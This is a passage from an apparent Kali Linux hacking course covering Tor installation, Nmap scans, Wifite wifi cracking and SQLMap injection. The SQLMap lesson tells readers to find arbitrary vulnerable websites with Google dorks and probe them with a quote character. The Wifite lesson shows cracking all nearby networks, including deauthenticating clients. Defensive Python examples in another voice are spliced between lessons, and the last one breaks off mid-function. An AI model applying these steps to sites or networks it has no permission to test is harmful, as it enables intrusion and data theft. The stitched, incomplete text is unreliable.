specialized servers called Directory Authorities (DA), the servers that help Tor clients find Tor relays in the
anonymous network.
On the other side, last month 12 high-capacity Tor middle relays were launched by Polaris, a new initiative by
Mozilla, the Tor Project and the Center for Democracy and Technology, in order to help build more privacy
controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps ease the finite
number of Tor connections that can occur at the same time.
Installing Tor in Kali Linux:
Step 1: Getting tor service ready
There are 3 ways of installing Tor service in Kali Linux. You can install Tor by following any of these options:
Option #1: Install Tor from Kali Repository
Tor is available in the Kali repository; to install it directly from the repository, open your Terminal and type:
apt-get install tor
If no error occurs, follow the second step.
Option #2: Install Tor from Debian Wheezy Repository
If you can't install Tor using the first method, you may try this option. Here we add the official Tor repository
matching our Debian distribution. Not to be confused: Kali is actually based on Debian and uses the package
management from "Wheezy", so we use "Wheezy" as our distribution.
Now open your terminal and follow these steps:
Step #1: Add repo to sources.list file
Let's add the distribution to the list by opening the sources.list file:
leafpad /etc/apt/sources.list
Now add the following line at the bottom of the file:
deb http://deb.torproject.org/torproject.org wheezy main
Step #2: Add GPG Keys
Now we need to add the GPG key used to sign the packages by running the following commands:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
Step #3: Update package lists
Let's refresh our sources:
apt-get update
Step #4: Install signing keys
Now, before installing Tor, we must add the signing key package:
apt-get install deb.torproject.org-keyring
Step #5: Install Tor from Debian repository
Finally,
apt-get install tor
Now Tor should be installed!
If no error occurs, follow the second step.
Option #3: Install Tor from development branch
If you are an advanced user and you want to install Tor using the development branch then this method is for
you.
Step #1: Add Tor project repository to sources.list
You need to add a different set of lines to your /etc/apt/sources.list file:
deb http://deb.torproject.org/torproject.org wheezy main
deb http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main
Step #2: Add GPG keys, keyring and install Tor
Then run the following commands at your command prompt:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
apt-get update
apt-get install tor deb.torproject.org-keyring
Now Tor should be installed!
If no error occurs, follow the second step.
Note: This release will provide you with more features, but it contains bugs too.
Option #4: Build and Install Tor from sources
If you want to build your own debs from source you must first add an appropriate deb-src line to sources.list:
deb-src http://deb.torproject.org/torproject.org wheezy main
deb-src http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main
You also need to install the necessary packages to build your own debs and the packages needed to build Tor:
apt-get install build-essential fakeroot devscripts
apt-get build-dep tor
Then you can build Tor in ~/debian-packages:
mkdir ~/debian-packages; cd ~/debian-packages
apt-get source tor
cd tor-*
debuild -rfakeroot -uc -us
cd ..
Now you can install the new package:
dpkg -i tor_*.deb
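The security-relevant detail in Options #2 to #4 is the key handling: the short ID given to gpg --recv and the full fingerprint given to gpg --export must describe the same key, or apt-key ends up trusting something else. The following Python is an added example, not part of the course or of the Tor project's documentation; it checks that relationship for the values shown above, builds the sources.list lines the options describe (assuming the experimental suite naming tor-experimental-0.2.5.x-<dist>), and reports which suites a sources.list is still missing. The sample sources.list is constructed for the example.

```python
import re
from typing import List, Optional, Tuple

# Values taken from Option #2 above
TOR_REPO_URL = "http://deb.torproject.org/torproject.org"
TOR_KEY_SHORT_ID = "886DDD89"
TOR_KEY_FINGERPRINT = "A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89"


def key_id_matches_fingerprint(short_id: str, fingerprint: str) -> bool:
    """A short key ID is the low 32 bits (last 8 hex digits) of the full
    fingerprint, so the ID passed to `gpg --recv` and the fingerprint passed
    to `gpg --export` must agree; otherwise apt-key would trust another key."""
    fp = fingerprint.replace(" ", "").upper()
    if not re.fullmatch(r"[0-9A-F]{40}", fp):
        return False
    return fp.endswith(short_id.upper())


def tor_sources_lines(dist: str, experimental_suite: Optional[str] = None,
                      with_src: bool = False) -> List[str]:
    """sources.list entries for the stable suite (Option #2), an experimental
    suite named like tor-experimental-0.2.5.x-<dist> (Option #3, assumed
    naming) and the matching deb-src lines (Option #4)."""
    suites = [dist]
    if experimental_suite:
        suites.append(f"{experimental_suite}-{dist}")
    lines = [f"deb {TOR_REPO_URL} {s} main" for s in suites]
    if with_src:
        lines += [f"deb-src {TOR_REPO_URL} {s} main" for s in suites]
    return lines


SOURCES_RE = re.compile(r"^\s*(deb|deb-src)\s+(\S+)\s+(\S+)\s+(\S.*?)\s*$")


def tor_entries(sources_text: str) -> List[Tuple[str, str]]:
    """(type, suite) for every active line that points at the Tor repository."""
    found = []
    for line in sources_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = SOURCES_RE.match(line)
        if m and m.group(2) == TOR_REPO_URL:
            found.append((m.group(1), m.group(3)))
    return found


def missing_suites(sources_text: str, wanted: List[str]) -> List[str]:
    """Which of the wanted suites have no active `deb` line yet."""
    present = {suite for kind, suite in tor_entries(sources_text) if kind == "deb"}
    return [s for s in wanted if s not in present]


# Constructed sources.list: one main repository entry plus the Option #2 line,
# with a commented-out copy to show that comments are ignored.
SAMPLE_SOURCES_LIST = """\
deb http://http.kali.org/kali kali main contrib non-free
# deb http://deb.torproject.org/torproject.org wheezy main
deb http://deb.torproject.org/torproject.org wheezy main
deb-src http://deb.torproject.org/torproject.org wheezy main
"""

if __name__ == "__main__":
    print("key ok:", key_id_matches_fingerprint(TOR_KEY_SHORT_ID, TOR_KEY_FINGERPRINT))
    print(tor_entries(SAMPLE_SOURCES_LIST))
    print("missing:", missing_suites(SAMPLE_SOURCES_LIST,
                                     ["wheezy", "tor-experimental-0.2.5.x-wheezy"]))
```

Run it before editing sources.list by hand; a fingerprint that does not end in the short ID you fetched is the signal to stop and re-check the key rather than pipe it into apt-key add.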
Step #2: Downloading and Running Tor bundle
Download the Tor Bundle from here:
https://www.torproject.org/projects/torbrowser.html.en
Download the architecture-appropriate file above, save it somewhere, then run one of the following two
commands to extract the package archive:
tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz
or (for the 64-bit version):
tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz
(where LANG is the language listed in the filename).
Once that’s done, switch to the Tor browser directory by running:
cd tor-browser_LANG
(where LANG is the language listed in the filename).
To run the Tor Browser Bundle, execute the start-tor-browser script:
./start-tor-browser
This will launch Vidalia and once that connects to Tor, it will launch Firefox.
Note: Do not unpack or run TBB as root. (though in Kali Linux, it doesn’t make any differences)
Lesson 5: Introduction to NMap
Nmap is a very useful tool, especially for identifying open ports that are exposed to attacks and infiltration; its
GUI is user friendly and boasts a wide variety of features.
Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. Many
systems and network administrators also find it useful for tasks such as network inventory, managing service
upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application name and version) those hosts
are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls
are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine
against single hosts. Nmap runs on all major computer operating systems, and both console and graphical
versions are available.
This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. An
important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP
account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines
as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL), and
copyright.
Nmap Overview and Demonstration
Sometimes the best way to understand something is to see it in action. This section includes examples of
Nmap used in (mostly) fictional yet typical circumstances. Nmap newbies should not expect to understand
everything at once. This is simply a broad overview of features that are described in depth in later chapters.
The “solutions” included throughout this book demonstrate many other common Nmap tasks for security
auditors and network administrators.
Avatar Online
Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small
San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays. Felix
spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments
and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and
fascination since a childhood spent learning everything he could about networking, security, Unix, and phone
systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation
Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining
his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of
network intrusions as before, but with the added benefit of contractual immunity from prosecution and even a
paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management
when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to
announce that the sales department closed a pen-testing deal with the Avatar Online gaming company.
Avatar Online (AO) is a small company working to create the next generation of massive multi-player online
role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neal
Stephenson's Snow Crash, is fascinating but still highly confidential. After witnessing the high-profile leak of
Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to
initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical
security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities
found.
The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what
IP address ranges the target is using, what hosts are available, what services those hosts are offering, general
network topology details, and what firewall/filtering policies are in effect.
Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another
geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and
more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network
on 6.209.24.0/24 and their production/DMZ systems residing on 6.207.0.0/22. Felix checks the IP whois
records anyway and confirms that these IP ranges are allocated to AO[1]. Felix subconsciously decodes the
CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem.
Being the careful type, Felix first starts out with what is known as an Nmap list scan (-sL option). This feature
simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless -n was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential
vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix
is doing this for another reason—to double-check that the IP ranges are correct. The systems administrator
who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster. The
contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but will
not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of
the results are shown in Example 1.1
felix> nmap -sL 6.209.24.0/24 6.207.0.0/22
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for fw.corp.avataronline.com (6.209.24.1)
Nmap scan report for dev2.corp.avataronline.com (6.209.24.2)
Nmap scan report for 6.209.24.3
Nmap scan report for 6.209.24.4
...
Nmap scan report for dhcp-21.corp.avataronline.com (6.209.24.21)
Nmap scan report for dhcp-22.corp.avataronline.com (6.209.24.22)
Nmap scan report for dhcp-23.corp.avataronline.com (6.209.24.23)
...
Nmap scan report for 6.207.0.0
Nmap scan report for gw.avataronline.com (6.207.0.1)
Nmap scan report for ns1.avataronline.com (6.207.0.2)
Nmap scan report for ns2.avataronline.com (6.207.0.3)
Nmap scan report for ftp.avataronline.com (6.207.0.4)
Nmap scan report for 6.207.0.5
Nmap scan report for 6.207.0.6
Nmap scan report for www.avataronline.com (6.207.0.7)
Nmap scan report for 6.207.0.8
...
Nmap scan report for cluster-c120.avataronline.com (6.207.2.120)
Nmap scan report for cluster-c121.avataronline.com (6.207.2.121)
Nmap scan report for cluster-c122.avataronline.com (6.207.2.122)
...
Nmap scan report for 6.207.3.255
Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
felix>
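Felix's reason for the list scan is scope control: every reverse-DNS name should belong to the client, and every address should sit inside the netblocks the contract names. The Python below is an added example, not code from the Nmap book or from this course; it parses "Nmap scan report for" lines, counts the addresses covered by the CIDR targets (the 1,280 Felix worked out by hand) and flags entries that fail either check. The sample output is a constructed excerpt modelled on Example 1.1, with one made-up foreign hostname (mail.someoneelse.example) inserted inside AO's range so the scope check has something to catch.

```python
import ipaddress
import re
from typing import List, Optional, Tuple

# Constructed excerpt modelled on Example 1.1; the someoneelse.example host is
# invented for the demonstration and is not in the book's output.
SAMPLE_LIST_SCAN = """\
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for fw.corp.avataronline.com (6.209.24.1)
Nmap scan report for dev2.corp.avataronline.com (6.209.24.2)
Nmap scan report for 6.209.24.3
Nmap scan report for gw.avataronline.com (6.207.0.1)
Nmap scan report for www.avataronline.com (6.207.0.7)
Nmap scan report for mail.someoneelse.example (6.207.1.9)
Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
"""

# "Nmap scan report for NAME (IP)" when reverse DNS resolved, "... for IP" otherwise
REPORT_RE = re.compile(r"^Nmap scan report for (?:(\S+) \((\S+)\)|(\S+))$")


def parse_list_scan(text: str) -> List[Tuple[str, Optional[str]]]:
    """Return (ip, reverse_dns_name_or_None) for every scan-report line."""
    entries = []
    for line in text.splitlines():
        m = REPORT_RE.match(line.strip())
        if not m:
            continue
        name, ip, bare_ip = m.groups()
        entries.append((ip or bare_ip, name))
    return entries


def address_count(targets: List[str]) -> int:
    """Total addresses covered by the CIDR targets (256 + 1024 for Felix's two)."""
    return sum(ipaddress.ip_network(t, strict=False).num_addresses for t in targets)


def out_of_scope(entries, targets: List[str], authorized_domain: str):
    """Entries whose address lies outside the authorized netblocks or whose
    reverse-DNS name does not belong to the client's domain. Either case is a
    reason to stop and confirm the scope with the client before scanning."""
    nets = [ipaddress.ip_network(t, strict=False) for t in targets]
    suspicious = []
    for ip, name in entries:
        addr = ipaddress.ip_address(ip)
        in_range = any(addr in net for net in nets)
        name_ok = (name is None or name == authorized_domain
                   or name.endswith("." + authorized_domain))
        if not (in_range and name_ok):
            suspicious.append((ip, name))
    return suspicious


if __name__ == "__main__":
    targets = ["6.209.24.0/24", "6.207.0.0/22"]
    hosts = parse_list_scan(SAMPLE_LIST_SCAN)
    print(f"{len(hosts)} entries, {address_count(targets)} addresses in scope")
    for ip, name in out_of_scope(hosts, targets, "avataronline.com"):
        print("check with client:", ip, name)
```

Hosts with no reverse-DNS entry pass the name check by default; they still have to fall inside the authorized ranges, which is the check that protects against the typo in an IP range that Felix worries about.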
Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online.
No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many
machines are in use and a good idea of what many are used for. He is now ready to get a bit more intrusive
and try a port scan. He uses Nmap features that try to determine the application and version number of each
service listening on the network. He also requests that Nmap try to guess the remote operating system via a
series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that
does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans.
After a bit of consideration, Felix settles on the following command:
nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan%D 6.209.24.0/24 6.207.0.0/22
Intro – Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was
designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in
novel ways to determine what hosts are available on the network, what services (application name and version)
those hosts are offering, what operating systems (and OS versions) they are running, what type
of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is
commonly used for security audits, many systems and network administrators find it useful for routine tasks
such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
1. How to open nmap
A. GUI method
Application → Kali Linux → Information gathering → DNS Analysis → nmap
B. Open a terminal, type nmap and hit Enter
2. Scan a single IP address (whether the firewall on the target PC is off or on)
Syntax – nmap IP address/hostname
Ex – nmap 192.168.75.131
Ex – nmap google.com
3. Speed up your nmap scan – the fast option scans fewer ports, which decreases scan time
Syntax – nmap -F IP address
Ex – nmap -F google.com
4. Scan multiple IP addresses or a subnet
A. Scan a range of IP addresses
Syntax – nmap IP address range
Ex – nmap 192.168.75.1-131
B. Scan a range of IP addresses using a wildcard
Ex – nmap 192.168.75.*
C. Scan an entire subnet
Ex – nmap 192.168.75.1/24
5. Turn on OS detection
Ex – nmap -O 192.168.75.131
6. Scan TCP ports on the target IP with a TCP connect scan
Ex – nmap -sT 192.168.75.131
7. Scan a firewall for security weaknesses
A. Null scan – a TCP Null scan sends a segment with no flags set to get a response through a firewall
Ex – nmap -sN 192.168.75.131
B. FIN scan – a TCP FIN scan to check the firewall
Ex – nmap -sF 192.168.75.131
C. TCP Xmas scan to check the firewall
Ex – nmap -sX 192.168.75.131
8. UDP scan – scan a host for UDP services. This scan is used to view open UDP ports.
Ex – nmap -sU 192.168.75.131
9. IP protocol scan – this type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.)
are supported by target machines.
Ex – nmap -sO 192.168.75.131
10. Detect remote service (server/daemon) version numbers
Ex – nmap -sV 192.168.75.131
11. Find out the most commonly used TCP ports using a TCP SYN scan
A. Stealthy scan
Ex – nmap -sS 192.168.75.131
B. Find out the most commonly used TCP ports using a TCP connect scan
Ex – nmap -sT 192.168.75.131
C. Find out the most commonly used TCP ports using a TCP ACK scan
Ex – nmap -sA 192.168.75.131
D. Find out the most commonly used TCP ports using a TCP Window scan
Ex – nmap -sW 192.168.75.131
E. Find out the most commonly used TCP ports using a TCP Maimon scan
Ex – nmap -sM 192.168.75.131
12. List scan – this option lists the targets that would be scanned without scanning them
Ex – nmap -sL 192.168.75.131
13. Host discovery or ping scan – scan a network and find out which servers and devices are up and running
Ex – nmap -sP 192.168.75.0/24
14. Scan a host when it is protected by a firewall (skip host discovery)
Ex – nmap -PN 192.168.75.1
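The Null, FIN and Xmas probes in item 7 are the easiest scans to spot from the receiving end, because a legitimate TCP segment never carries those flag combinations: real traffic has SYN, ACK or RST set, and FIN travels with ACK. The following Python is an added example written for this lesson, not part of Nmap or of the course; it classifies flag strings the way a firewall log or capture summary renders them and reports sources that sent several such probes. The flow records are constructed for the example.

```python
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed flow records: (src_ip, dst_ip, dst_port, tcp_flags), with flags as
# letters (S=SYN, A=ACK, F=FIN, P=PSH, U=URG, R=RST); "" means no flags at all.
SAMPLE_PACKETS: List[Tuple[str, str, int, str]] = [
    ("10.0.0.5", "192.168.75.131", 22, "S"),     # ordinary connection attempt
    ("10.0.0.5", "192.168.75.131", 80, "S"),
    ("10.0.0.5", "192.168.75.131", 80, "A"),     # ACK inside an established flow
    ("10.0.0.9", "192.168.75.131", 22, ""),      # Null probe (item 7.A)
    ("10.0.0.9", "192.168.75.131", 25, ""),
    ("10.0.0.9", "192.168.75.131", 80, "F"),     # FIN probe (item 7.B)
    ("10.0.0.9", "192.168.75.131", 443, "FPU"),  # Xmas probe (item 7.C)
    ("10.0.0.9", "192.168.75.131", 8080, "UPF"),
]


def classify_tcp_flags(flags: str) -> str:
    """Name the probe type a flag combination corresponds to, or "normal".
    Flag order does not matter, so the letters are compared as a set."""
    f = set(flags.upper())
    if not f:
        return "null"
    if f == {"F"}:
        return "fin"
    if f == {"F", "P", "U"}:
        return "xmas"
    return "normal"


def detect_scan_probes(packets, threshold: int = 3) -> Dict[str, Counter]:
    """Count null/fin/xmas probes per source address and return the sources
    that sent at least `threshold` of them. The threshold only filters out a
    lone malformed packet; even one Xmas segment deserves a look."""
    per_src: Dict[str, Counter] = defaultdict(Counter)
    for src, _dst, _port, flags in packets:
        kind = classify_tcp_flags(flags)
        if kind != "normal":
            per_src[src][kind] += 1
    return {src: c for src, c in per_src.items() if sum(c.values()) >= threshold}


if __name__ == "__main__":
    for src, counts in detect_scan_probes(SAMPLE_PACKETS).items():
        print(f"{src}: {dict(counts)}")
```

Because these segments have no legitimate reason to exist, a rule on the flag combinations produces almost no false positives, and a stateful firewall drops them outright, which is why the page describes these scans as a way to test the firewall rather than the host.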
Lesson 6: Wifi Hacking the easy way: Using WIFITE
Wifite
While the aircrack-ng suite is a well known name in wireless hacking, the same can't be said about Wifite.
Living in the shade of the greatness of the established aircrack-ng suite, Wifite has finally made a mark in a field
where aircrack-ng failed: it made wifi hacking everyone's piece of cake. While not all its features are
independent (e.g. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot. I'm
listing some features before I tell you how to use wifite (which I don't think is necessary at all, as anyone who
can understand the simple English instructions given by Wifite can use it on their own).
Features Of Wifite
Sorts targets by signal strength (in dB); cracks closest access points first
Automatically de-authenticates clients of hidden networks to reveal SSIDs
Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
Customizable settings (timeouts, packets/sec, etc)
"Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks
are complete
All captured WPA handshakes are backed up to wifite.py's current directory
Smart WPA de-authentication; cycles between all clients and broadcast deauths
Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
Displays session summary at exit; shows any cracked keys
All passwords saved to cracked.txt
Built-in updater: ./wifite.py -upgrade
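Two of the features listed above rely on de-authentication frames ("automatically de-authenticates clients of hidden networks" and "cycles between all clients and broadcast deauths"), and that is exactly what a wireless IDS watches for: a burst of deauth frames for one BSSID, particularly to the broadcast address, does not happen in normal operation. The Python below is an added example, not code from Wifite or from this course; it runs a sliding window over constructed 802.11 management-frame records and reports BSSIDs with a deauth burst. The frame records and the window size are constructed assumptions for the example.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed management-frame records: (timestamp_s, subtype, bssid, destination)
# as a monitor-mode capture summary might list them.
SAMPLE_FRAMES: List[Tuple[float, str, str, str]] = [
    (0.0, "beacon", "aa:bb:cc:00:00:01", BROADCAST),
    (0.5, "deauth", "aa:bb:cc:00:00:01", "11:22:33:44:55:66"),
    (0.6, "deauth", "aa:bb:cc:00:00:01", "11:22:33:44:55:77"),
    (0.7, "deauth", "aa:bb:cc:00:00:01", BROADCAST),
    (0.9, "deauth", "aa:bb:cc:00:00:01", "11:22:33:44:55:66"),
    (1.1, "deauth", "aa:bb:cc:00:00:01", BROADCAST),
    (5.0, "deauth", "aa:bb:cc:00:00:02", "11:22:33:44:55:88"),  # one ordinary deauth
    (30.0, "beacon", "aa:bb:cc:00:00:02", BROADCAST),
]


def deauth_bursts(frames, window_s: float = 2.0, threshold: int = 4) -> Dict[str, dict]:
    """Per BSSID, find the largest number of deauth frames inside any window of
    window_s seconds; report BSSIDs where that number reaches the threshold,
    together with whether broadcast deauths were used and how many distinct
    client addresses were targeted."""
    by_bssid: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    for ts, subtype, bssid, dst in frames:
        if subtype == "deauth":
            by_bssid[bssid].append((ts, dst))
    alerts: Dict[str, dict] = {}
    for bssid, events in by_bssid.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):
            # slide the window start forward until it fits within window_s
            while events[end][0] - events[start][0] > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            targets = {dst for _, dst in events}
            alerts[bssid] = {
                "count": best,
                "broadcast": BROADCAST in targets,
                "clients": len(targets - {BROADCAST}),
            }
    return alerts


if __name__ == "__main__":
    for bssid, info in deauth_bursts(SAMPLE_FRAMES).items():
        print(f"deauth burst from {bssid}: {info}")
```

A single deauth per client is normal roaming or timeout behaviour, which is why the second BSSID is not reported. On the mitigation side, 802.11w (protected management frames) lets clients discard deauth frames that are not authenticated, so enabling it on the access point removes the effect these frames have.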
I find it worth mentioning here that not only does it hack wifi the easy way, it also hacks in the best possible
way.
For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP Method to
speed up data packets.
Hacking WEP network
wifite -wep
You might even have used the command
wifite
The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when
you think it has scanned enough, you can tell it to stop by pressing Ctrl+C. It'll then ask you which wifi to hack. In
my case, I didn't specify -wep, so it shows all the wifis in range.
You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be
hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets)
within 5 mins. Basically you can expect it to hack the wifi in 10 mins approx. Notice how it automatically did the
fake auth and ARP replay.
Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something
that should bother you; you can stick with the simple wifite. Also, specifying the channel is optional, so even the
-c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, via -frag).
Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait.
However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you
saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many
other attacks can be played with. A good idea would be to execute the following:
wifite -help
This will tell you about the common usage commands, which will be very useful. Here is the list of WEP
commands for different attacks:
WEP
-wep              only target WEP networks [off]
-pps <num>        set the number of packets per second to inject [600]
-wept <sec>       sec to wait for each attack, 0 implies endless [600]
-chopchop         use chopchop attack [on]
-arpreplay        use arpreplay attack [on]
-fragment         use fragmentation attack [on]
-caffelatte       use caffe-latte attack [on]
-p0841            use -p0841 attack [on]
-hirte            use hirte (cfrag) attack [on]
-nofakeauth       stop attack if fake authentication fails [off]
-wepca <n>        start cracking when number of ivs surpass n [10000]
-wepsave          save a copy of .cap files to this directory [off]
Troubleshooting
Wifite quits unexpectedly, stating "Scanning for wireless devices. No wireless interfaces were found. You need
to plug in a wifi device or install drivers. Quitting."
You are most probably using Kali inside a virtual machine. A virtual machine does not support the internal
wireless card. Either buy an external wireless card, or do a live boot / dual boot with Windows, anything other
than a virtual machine in general.
Lesson 7: Sql Injection using SQLMap
Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this
tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its
employees from any legal liability for your actions.
SQL injection is a way of extracting user login info and other data from insecure SQL databases on company
servers. It is one of the most common ways sites are hacked.
What is SQLMAP
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL
injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche
features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting,
over data fetching from the database, to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.
Features
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite,
Firebird, Sybase and SAP MaxDB database management systems.
Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION
query, stacked queries and out-of-band.
Support to directly connect to the database without passing via a SQL injection, by providing DBMS
credentials, IP address, port and database name.
Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
Automatic recognition of password hash formats and support for cracking them using a dictionary-based
attack.
Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user
can also choose to dump only a range of characters from each column's entry.
Support to search for specific database names, specific tables across all databases or specific columns across
all databases' tables. This is useful, for instance, to identify tables containing custom application credentials
where relevant columns' names contain strings like name and pass.
Support to download and upload any file from the database server underlying file system when the database
software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the database server underlying
operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to establish an out-of-band stateful TCP connection between the attacker machine and the database
server underlying operating system. This channel can be an interactive command prompt, a Meterpreter
session or a graphical user interface (VNC) session as per user’s choice.
Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
[Source: www.sqlmap.org]
Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other step. Those who know how to use Google
Dorks know this already, but in case you don't, I have put together a number of strings that you can search in
Google. Just copy and paste any of the lines into Google and Google will show you a number of search results.
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
You can google a list of google dork strings.
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every google dork string, you will get hundreds of search results. How do you know which is really
vulnerable to SQLMAP SQL Injection? There are multiple ways, and I am sure people would argue which one is
best, but to me the following is the simplest and most conclusive.
Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a
single quotation mark).
So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirects you to
a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for
obvious reasons.
Examples of SQLi Errors from Different Databases and Languages
Microsoft SQL Server
Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.
Description: An unhandled exception occurred during the execution of the current web request. Please review
the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string
‘attack;’.
MySQL Errors
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version
for the right syntax to use near ‘’’ at line 12
Oracle Errors
java.sql.SQLException: ORA-00933: SQL command not properly ended at
oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated
PostgreSQL Errors
Query failed: ERROR: unterminated quoted string at or near "'''"
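Every error message above is the same defect seen from a different database: the parameter from the URL is pasted into the SQL text, so the stray quote from Step 1.b breaks the statement, and the server then echoes the DBMS message to the client. The Python below is an added example written for this lesson, not code from sqlmap or from the site in the screenshots; it reproduces the item.cgi?item_id= lookup against an in-memory SQLite table in its vulnerable form and in a fixed form that validates and binds the parameter, and shows a request handler that never returns the database message. The table contents and the handler are constructed for the example.

```python
import sqlite3
from typing import Callable, List, Tuple

# Constructed stand-in for the "item" table behind item.cgi?item_id=15
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (item_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO item VALUES (?, ?)", [(15, "widget"), (16, "gadget")])
    return conn


def lookup_item_vulnerable(conn: sqlite3.Connection, item_id: str) -> List[Tuple[str]]:
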